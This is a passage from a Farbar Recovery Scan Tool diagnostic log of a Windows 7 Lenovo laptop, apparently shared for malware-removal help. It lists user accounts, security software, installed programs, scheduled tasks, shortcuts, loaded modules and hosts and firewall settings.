2011-04-18 07:39 - 2011-04-18 07:39 - 0226364 ____R () C:\ProgramData\DeviceManager.xml.rc4
2014-05-16 11:21 - 2014-05-16 11:21 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-06-21 17:36

==================== End of FRST.txt ============================

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-07-2016
Ran by User1 (2016-07-04 23:04:08)
Running from C:\Users\User1\Desktop\FRST64
Windows 7 Professional Service Pack 1 (X64) (2014-05-16 16:49:47)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2572138134-34439291-2312372487-500 - Administrator - Disabled)
Guest (S-1-5-21-2572138134-34439291-2312372487-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2572138134-34439291-2312372487-1002 - Limited - Enabled)
User1 (S-1-5-21-2572138134-34439291-2312372487-1000 - Administrator - Enabled) => C:\Users\User1

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
AS: Microsoft Security Essentials (Enabled - Up to date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 21.0.0.176 - Adobe Systems Incorporated)
Adobe Flash Player 22 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 22.0.0.192 - Adobe Systems Incorporated)
Adobe Flash Player 22 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 22.0.0.192 - Adobe Systems Incorporated)
Amazon Send to Kindle (HKLM-x32\...\SendToKindle) (Version: 1.0.1.240 - Amazon)
Amazon Unbox Video (HKLM-x32\...\InstallShield_{54A4839E-87F8-4BD1-9682-A349E9943F0A}) (Version: 5.0.0.17 - Amazon.com)
Amazon Unbox Video (x32 Version: 5.0.0.17 - Amazon.com) Hidden
Apple Application Support (32-bit) (HKLM-x32\...\{26356515-5821-40FA-9C3D-9785052A1062}) (Version: 4.3.1 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{C2651553-6CA3-4822-B2E6-BC4ACA6E0EA2}) (Version: 4.3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2E4AF2A6-50EA-4260-9BA4-5E582D11879A}) (Version: 9.3.0.15 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Brother MFL-Pro Suite MFC-J6920DW (HKLM-x32\...\{6A367B4D-2E1C-4843-9FF0-A1DF1DEAB1E6}) (Version: 1.0.0.0 - Brother Industries, Ltd.)
Chicktionary (HKLM-x32\...\Chicktionary) (Version: 32.0.0.0 - Shockwave.com)
Dolby Home Theater v4 (HKLM-x32\...\{B26438B4-BF51-49C3-9567-7F14A5E40CB9}) (Version: 7.2.8000.17 - Dolby Laboratories Inc)
Dominion (HKLM-x32\...\Dominion) (Version: 2.01.03.15 - MakingFun)
DVDSmith Movie Backup 1.0.8 (HKLM-x32\...\DVDSmith Movie Backup_is1) (Version:  - dvdsmith.com)
EditPad Lite 7.3.8 (HKLM\...\EditPad Lite) (Version: 7.3.8 - Just Great Software)
FileZilla Client 3.9.0.3 (HKLM-x32\...\FileZilla Client) (Version: 3.9.0.3 - Tim Kosse)
Foxit Cloud (HKLM-x32\...\{41914D8B-9D6E-4764-A1F9-BC43FB6782C1}_is1) (Version: 2.9.56.313 - Foxit Software Inc.)
Foxit PhantomPDF Standard (HKLM-x32\...\{0A33872C-25C0-4E0A-80DB-53067BB717DD}) (Version: 7.1.3.320 - Foxit Software Inc.)
Foxit Reader (HKLM-x32\...\Foxit Reader_is1) (Version: 7.1.3.320 - Foxit Software Inc.)
Framework to DOC Converter (HKLM-x32\...\FwWordConverter) (Version:  - )
GIMP 2.8.10 (HKLM\...\GIMP-2_is1) (Version: 2.8.10 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 51.0.2704.103 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.30.3 - Google Inc.) Hidden
HandBrake 0.9.9.1 (HKLM-x32\...\HandBrake) (Version: 0.9.9.1 - )
iExplorer 3.8.1.0 (HKLM-x32\...\{7FD8B0C1-CDDA-4B4D-A577-B2E3570EA3A3}_is1) (Version:  - Macroplant LLC)
Instant Eyedropper 1.8.0.0 (HKLM-x32\...\Instant Eyedropper_is1) (Version:  - )
Integrated Camera Driver Installer Package Ver.1.0.0.30 (HKLM-x32\...\{F8754583-7893-4CD8-9E51-1A08F3D4C1A9}) (Version: 1.0.0.30 - RICOH)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.22.1760 - Intel Corporation)
Intel® Network Connections Drivers (HKLM\...\PROSet) (Version: 18.7 - Intel)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.18.10.3359 - Intel Corporation)
Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 3.0.0.66956 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.9.254 - Intel Corporation)
Intel® WiDi (HKLM\...\{F949AE30-83D1-41B2-92D2-F44478DD058A}) (Version: 4.2.24.0 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{7991b5ae-96d7-4df2-97fb-a605b7cb638b}) (Version: 17.12.0 - Intel Corporation)
iTunes (HKLM\...\{58D7E5F7-BAD1-49C5-93C8-B655736EDA00}) (Version: 12.4.0.119 - Apple Inc.)
Java 8 Update 91 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218091F0}) (Version: 8.0.910.15 - Oracle Corporation)
King's Bounty: Crossworlds (HKLM\...\Steam App 63910) (Version:  - Katauri Interactive)
Lenovo Auto Scroll Utility (HKLM\...\LenovoAutoScrollUtility) (Version: 2.12 - )
Lenovo Communications Utility (HKLM\...\{88C6A6D9-324C-46E8-BA87-563D14021442}_is1) (Version: 3.1.16.0 - Lenovo)
Lenovo On Screen Display (HKLM\...\OnScreenDisplay) (Version: 8.80.10 - Lenovo)
Lenovo Patch Utility 64 bit (Version: 1.3.2.6 - Lenovo Group Limited) Hidden
Lenovo Power Management Driver (HKLM\...\Power Management Driver) (Version: 1.67.10.20 - Lenovo)
Lenovo Solution Center (HKLM\...\{AB46AC6D-3E9A-4484-8061-64FF10301B41}) (Version: 3.3.002.00 - Lenovo)
Lenovo System Update (HKLM-x32\...\{25C64847-B900-48AD-A164-1B4F9B774650}) (Version: 5.07.0029 - Lenovo)
Magical Jelly Bean KeyFinder (HKLM-x32\...\KeyFinder_is1) (Version: 2.0.10.10 - Magical Jelly Bean)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Metric Collection SDK (x32 Version: 1.1.0005.00 - Lenovo Group Limited) Hidden
Metric Collection SDK 35 (x32 Version: 1.2.0001.00 - Lenovo Group Limited) Hidden
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office 2007 Primary Interop Assemblies (HKLM-x32\...\{50120000-1105-0000-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-0014-0000-0000-0000000FF1CE}_PROR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Professional 2007 (HKLM-x32\...\PROR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.8.204.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40728.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2005 Tools for Office Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version:  - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
MKVToolNix 7.4.0 (64bit) (HKLM-x32\...\MKVToolNix) (Version: 7.4.0 - Moritz Bunkus)
Mozilla Firefox 47.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 47.0.1 (x86 en-US)) (Version: 47.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 47.0.1.6018 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
NirSoft ProduKey (HKLM-x32\...\NirSoft ProduKey) (Version:  - )
oDesk Team (HKU\S-1-5-21-2572138134-34439291-2312372487-1000\...\oDVT) (Version:  - oDesk Corporation)
Organ Trail: Director's Cut (HKLM-x32\...\Steam App 233740) (Version:  - The Men Who Wear Many Hats)
PDF Combine (HKLM-x32\...\PDF Combine_is1) (Version: 2.5 - Softplicity, Inc.)
Power Manager (HKLM-x32\...\{DAC01CEE-5BAE-42D5-81FC-B687E84E8405}) (Version: 6.68.10 - Lenovo Group Limited)
QuickBooks (x32 Version: 26.0.4005.2607 - Intuit Inc.) Hidden
QuickBooks Pro 2016 (HKLM-x32\...\{4338BDE2-0035-41BC-87BE-EE0AD5D48042}) (Version: 26.0.4005.2607 - Intuit Inc.)
QuickBooks Runtime Redistributable (HKLM\...\{F2A4F809-2DE6-4D27-888B-4D2BB8DAF20E}) (Version: 1.00.0000 - Intuit Inc.)
Railroad Tycoon 3 (HKLM-x32\...\{DE29025A-091F-4998-AD2D-24C84421190F}) (Version: 1.0 - )
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7404 - Realtek Semiconductor Corp.)
RICOH_Media_Driver_v2.14.18.01 (HKLM-x32\...\{FE041B02-234C-4AAA-9511-80DF6482A458}) (Version: 2.14.18.01 - RICOH)
Scrivener (HKLM-x32\...\Scrivener 1900) (Version: 1900 - Literature and Latte)
Serif DrawPlus Starter Edition (HKLM-x32\...\{33311EA4-0ECA-4E7F-83E5-8A92CD760152}) (Version: 2.0.2.010 - Serif (Europe) Ltd)
SHAREit (HKLM-x32\...\SHAREit_is1) (Version: 3.2.0.543 - Lenovo)
Skype™ 7.24 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.24.104 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
The Bottom of the Well (HKLM\...\Steam App 449020) (Version:  - Red Nettle Studio)
ThinkPad Bluetooth with Enhanced Data Rate Software (HKLM\...\{A1439D4F-FD46-47F2-A1D3-FEE097C29A09}) (Version: 6.5.1.4500 - Broadcom Corporation)
ThinkPad UltraNav Driver (HKLM\...\SynTPDeinstKey) (Version: 16.2.19.14 - )
ThinkVantage Access Connections (HKLM-x32\...\{8E537894-A559-4D60-B3CB-F4485E3D24E3}) (Version: 6.25.65 - Lenovo)
ThinkVantage Active Protection System (HKLM\...\{46A84694-59EC-48F0-964C-7E76E9F8A2ED}) (Version: 1.79.00.03 - Lenovo)
ThinkVantage Fingerprint Software (HKLM\...\{F58DA859-016E-492D-A588-317D9BB28002}) (Version: 5.9.9.7282 - Authentec Inc.)
ThinkVantage Password Manager (HKLM-x32\...\{70EE2BAA-F82A-4B8A-950E-649EFD64D5B9}) (Version: 4.60.4.0 - Lenovo Group Limited)
To Burn in Memory (HKLM\...\Steam App 434120) (Version:  - Orihaus)
Trine 2 (HKLM\...\Steam App 35720) (Version:  - Frozenbyte)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-0014-0000-0000-0000000FF1CE}_PROR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
VC12X64Redist (HKLM\...\{B573CC21-AE24-4BC5-9B0B-15CF29A3F982}) (Version: 1.00.0000 - Intuit Inc.)
VC12X86Redist (HKLM-x32\...\{EA9886ED-21F8-4867-A049-CE6817291EE6}) (Version: 1.00.0000 - Intuit Inc.)
Visual Studio Tools for the Office system 3.0 Runtime (HKLM-x32\...\Visual Studio Tools for the Office system 3.0 Runtime) (Version:  - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime Service Pack 1 (KB949258) (HKLM-x32\...\{8FB53850-246A-3507-8ADE-0060093FFEA6}.KB949258) (Version: 1 - Microsoft Corporation)
VLC media player (HKLM\...\VLC media player) (Version: 2.2.1 - VideoLAN)
Vodafone Mobile Broadband Lite (HKLM-x32\...\{6C29152D-3FF9-43B2-84E4-9B35FC0BF5C2}) (Version: 10.2.103.31248 - Vodafone)
Wireshark 2.0.3 (64-bit) (HKLM-x32\...\Wireshark) (Version: 2.0.3 - The Wireshark developer community, hxxps://www.wireshark.org)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2572138134-34439291-2312372487-1000_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\User1\AppData\Roaming\Dropbox\bin\Dropbox.exe /autoplay => No File

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {050EB29E-C2B0-49CD-948F-8F8B93FC70B9} - System32\Tasks\{973EBCA8-13FC-4FC9-A17B-F72EC28DAA9F} => C:\Users\User1\Desktop\cdrw_usb.exe [2015-09-30] (Hewlett-Packard Company)
Task: {0DC58467-E110-44A2-94AD-91839DBBA2FE} - System32\Tasks\{2D58202E-985D-4C3C-B4DA-3773DA1746A6} => C:\Users\User1\Desktop\cdrw_usb.exe [2015-09-30] (Hewlett-Packard Company)
Task: {16D31C0E-8558-460F-A99F-210908D160B1} - System32\Tasks\Lenovo\LSC\LSCHardwareScan => C:\Program Files\Lenovo\Lenovo Solution Center\LSC.exe [2016-04-20] (Lenovo)
Task: {16F48D39-488A-43A8-ABEB-26161573A3C7} - System32\Tasks\Synaptics TouchPad Enhancements => Program Files\Synaptics\SynTP\SynTPEnh.exe
Task: {1F99488C-6245-4149-AFE5-2A82D9B9ADE7} - System32\Tasks\{C22F8FB1-0C1B-456D-A673-BC7DE9BBC9EA} => pcalua.exe -a C:\Users\User1\Desktop\cdrw_usb.exe -d C:\Users\User1\Desktop
Task: {23B39133-AEC4-4BD6-94AE-1936CA0C6799} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)
Task: {47A82873-906B-482D-B4AF-294B06D7D308} - System32\Tasks\Lenovo\LSC\LSCHardwareScanPostpone => C:\Program Files\Lenovo\Lenovo Solution Center\LSC.exe [2016-04-20] (Lenovo)
Task: {4B7D375C-C218-41F9-91AC-31DB701BEE11} - System32\Tasks\{B53B2FBA-689F-4469-B81D-77A5A2578B6D} => Firefox.exe hxxp://ui.skype.com/ui/0/7.2.0.103/en/eula
Task: {560C6AC3-B0BA-40CE-B442-5B168CFFA7DC} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-06-17] (Adobe Systems Incorporated)
Task: {5CA28A94-E6E1-4617-9452-C891EF58484C} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 => C:\Program Files (x86)\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe [2015-07-01] (Lenovo)
Task: {5FDE3E9F-4EBB-48AF-99EB-B674881BFAC6} - System32\Tasks\Lenovo\Lenovo Solution Center Launcher => C:\Program Files\lenovo\lenovo solution center\App\LSC.Services.UpdateStatusService.exe [2016-04-20] ()
Task: {726F67B6-7A3F-4A9A-B0D7-2E5D20A0E4CC} - System32\Tasks\PMTask => C:\Program Files (x86)\ThinkPad\Utilities\PwmIdTsv.exe [2016-04-14] (Lenovo Group Limited)
Task: {84AC1D00-6E33-4858-86CE-3F5781C417B9} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 35 => C:\Program Files (x86)\Lenovo\Customer Feedback Program 35\Lenovo.TVT.CustomerFeedback.Agent35.exe [2015-08-17] (Lenovo)
Task: {8B8E0E10-B5E7-4A28-8FBE-AA89CFD8E1D9} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-27] (Google Inc.)
Task: {953387FE-BC45-4785-B2D6-DCBFF3E52E78} - System32\Tasks\{E13195ED-6D24-4991-BBC7-755E00EB9873} => Firefox.exe hxxp://ui.skype.com/ui/0/7.2.0.103/en/eula
Task: {99E49901-85B5-49DB-A980-CE181E766BF9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-27] (Google Inc.)
Task: {B8D62B00-6B07-4574-A388-DAB5084F0413} - System32\Tasks\{28BB1BE4-29E6-40E6-81AA-4B76259079D4} => Firefox.exe hxxp://ui.skype.com/ui/0/7.2.0.103/en/privacy
Task: {C2532CF2-89CD-42F8-88BF-830F5ABBFBCD} - System32\Tasks\TVT\TVSUUpdateTask => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [2016-05-25] ()
Task: {CBF6B82D-2C44-4B2D-97C5-2E01E659577B} - System32\Tasks\Lenovo\LSC\Lenovo Solution Center Notifications => C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe [2016-04-20] (Lenovo)
Task: {DED424F2-3A49-4F4F-90BA-030ADB2D3DAB} - System32\Tasks\{32F8231C-00E1-45D7-963D-0A5BD7249447} => Firefox.exe hxxp://ui.skype.com/ui/0/7.2.0.103/en/privacy
Task: {E05D9D5D-8774-4F0A-92A9-3E40E891C903} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program => C:\Program Files\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe
Task: {EB9256A1-C6E5-4204-A795-487D2896881B} - System32\Tasks\{167203B5-F0D2-4EA6-A6B4-D55C48ED8AE7} => Firefox.exe hxxp://ui.skype.com/ui/0/7.2.0.103/en/eula

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\User1\Desktop\Backup HD Studd\Meredith's Computer - delete 2-9\2015-01-06\Users\Meredith\Desktop (copied)\Constant Guard Protection Suite.lnk -> hxxp://security.comcast.net/?cid=xfactiv_security (No File)
Shortcut: C:\Users\User1\Desktop\Backup HD Studd\Meredith's Computer - delete 2-9\2015-01-06\Users\Meredith\Desktop (copied)\Live PC Help.lnk -> hxxp://www.thephonesupport.com/?src=dtop (No File)
Shortcut: C:\Users\User1\Desktop\Backup HD Studd\Meredith's Computer - delete 2-9\2015-01-06\Users\Meredith\Desktop (copied)\XFINITY Connect.lnk -> hxxp://www.comcast.net/qry/goto?app=mail&cid=xfactiv_email (No File)
Shortcut: C:\Users\User1\Desktop\Backup HD Studd\Meredith's Computer - delete 2-9\2015-01-06\Users\Meredith\Desktop (copied)\XFINITY TV.lnk -> hxxp://xfinitytv.comcast.net/?cid=xfactiv_tv (No File)

==================== Loaded Modules (Whitelisted) ==============

2016-05-20 09:30 - 2016-04-14 06:08 - 00107008 _____ () C:\Program Files (x86)\ThinkPad\Utilities\US\PWMRT64V.DLL
2014-06-01 19:55 - 2013-04-15 10:50 - 00198144 _____ () C:\Windows\System32\HP1006LM.DLL
2014-06-01 19:56 - 2013-04-15 10:50 - 00065024 _____ () C:\Windows\system32\spool\PRTPROCS\x64\HP1006PP.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-04-22 01:07 - 2016-04-22 01:07 - 01337144 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2016-04-21 15:44 - 2005-04-21 23:36 - 00143360 _____ () C:\Windows\system32\BrSNMP64.dll
2014-05-16 11:22 - 2013-11-16 05:37 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2014-07-21 10:18 - 2014-06-23 20:47 - 00601376 _____ () C:\Program Files\Lenovo\Password Manager\pwm_website_config.dll
2014-05-30 17:29 - 2011-08-02 20:58 - 02201088 _____ () C:\Program Files\Lenovo\Communications Utility\cxcore210.dll
2014-05-30 17:29 - 2011-08-02 20:58 - 02085888 _____ () C:\Program Files\Lenovo\Communications Utility\cv210.dll
2015-02-22 07:41 - 2015-02-22 07:41 - 00110592 ____R () C:\Program Files (x86)\Amazon\Amazon Unbox Video\LimelightDownloadManager.dll
2014-06-23 20:44 - 2014-06-23 20:44 - 00546592 _____ () C:\Program Files (x86)\Lenovo\Password Manager\pwm_website_config.dll
2016-02-26 17:11 - 2016-04-29 15:10 - 00785920 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2016-02-26 17:11 - 2015-07-03 11:12 - 04962816 _____ () C:\Program Files (x86)\Steam\v8.dll
2016-02-26 17:11 - 2015-07-03 11:12 - 01556992 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2016-02-26 17:11 - 2015-07-03 11:12 - 01187840 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2016-02-26 17:11 - 2016-06-14 19:47 - 02387024 _____ () C:\Program Files (x86)\Steam\video.dll
2016-02-26 17:11 - 2016-02-08 18:14 - 02549760 _____ () C:\Program Files (x86)\Steam\libavcodec-56.dll
2016-02-26 17:11 - 2016-02-08 18:14 - 00442880 _____ () C:\Program Files (x86)\Steam\libavutil-54.dll
2016-02-26 17:11 - 2016-02-08 18:14 - 00491008 _____ () C:\Program Files (x86)\Steam\libavformat-56.dll
2016-02-26 17:11 - 2016-02-08 18:14 - 00332800 _____ () C:\Program Files (x86)\Steam\libavresample-2.dll
2016-02-26 17:11 - 2016-02-08 18:14 - 00485888 _____ () C:\Program Files (x86)\Steam\libswscale-3.dll
2016-02-26 17:11 - 2016-06-14 19:47 - 00829008 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2016-03-08 23:35 - 2016-02-17 17:25 - 00281088 _____ () C:\Program Files (x86)\Steam\openvr_api.dll
2016-02-11 17:26 - 2016-02-11 17:26 - 00630784 _____ () C:\Program Files (x86)\Intuit\QuickBooks 2016\boost_regex-vc120-mt-1_55.dll
2016-02-11 19:34 - 2016-02-11 19:34 - 00031512 _____ () C:\Program Files (x86)\Intuit\QuickBooks 2016\QBCompressor.dll
2016-02-11 17:27 - 2016-02-11 17:27 - 00059904 _____ () C:\Program Files (x86)\Intuit\QuickBooks 2016\zlib1.dll
2016-02-11 19:34 - 2016-02-11 19:34 - 00099096 _____ () C:\Program Files (x86)\Intuit\QuickBooks 2016\QBMAPILibrary.dll
2016-02-11 19:33 - 2016-02-11 19:33 - 00245528 _____ () C:\Program Files (x86)\Intuit\QuickBooks 2016\boost_serialization-vc120-mt-1_55.dll
2016-02-11 19:33 - 2016-02-11 19:33 - 00655640 _____ () C:\Program Files (x86)\Intuit\QuickBooks 2016\FtuEngine.dll
2016-02-11 19:33 - 2016-02-11 19:33 - 00687896 _____ () C:\Program Files (x86)\Intuit\QuickBooks 2016\BackupLib.dll
2016-02-11 19:34 - 2016-02-11 19:34 - 00084248 _____ () C:\Program Files (x86)\Intuit\QuickBooks 2016\QBProActiveCore.dll
2016-02-11 17:25 - 2016-02-11 17:25 - 38715904 _____ () C:\Program Files (x86)\Intuit\QuickBooks 2016\libcef.dll
2016-02-11 19:33 - 2016-02-11 19:33 - 01234712 _____ () C:\Program Files (x86)\Intuit\QuickBooks 2016\FeaturesBridge.dll
2016-02-11 19:33 - 2016-02-11 19:33 - 00067864 _____ () C:\Program Files (x86)\Intuit\QuickBooks 2016\mbpopup.dll
2016-04-21 15:44 - 2009-02-27 16:38 - 00139264 ____R () C:\Program Files (x86)\Brother\BrUtilities\BrLogAPI.dll
2016-02-26 17:11 - 2016-06-14 14:14 - 49826080 _____ () C:\Program Files (x86)\Steam\bin\libcef.dll
2014-05-30 17:34 - 2013-12-03 12:36 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2015-07-14 18:20 - 2015-07-14 18:20 - 00756376 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE12\MSPTLS.DLL

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2016-07-04 15:26 - 00000035 ____A C:\Windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2572138134-34439291-2312372487-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\User1\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)


==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
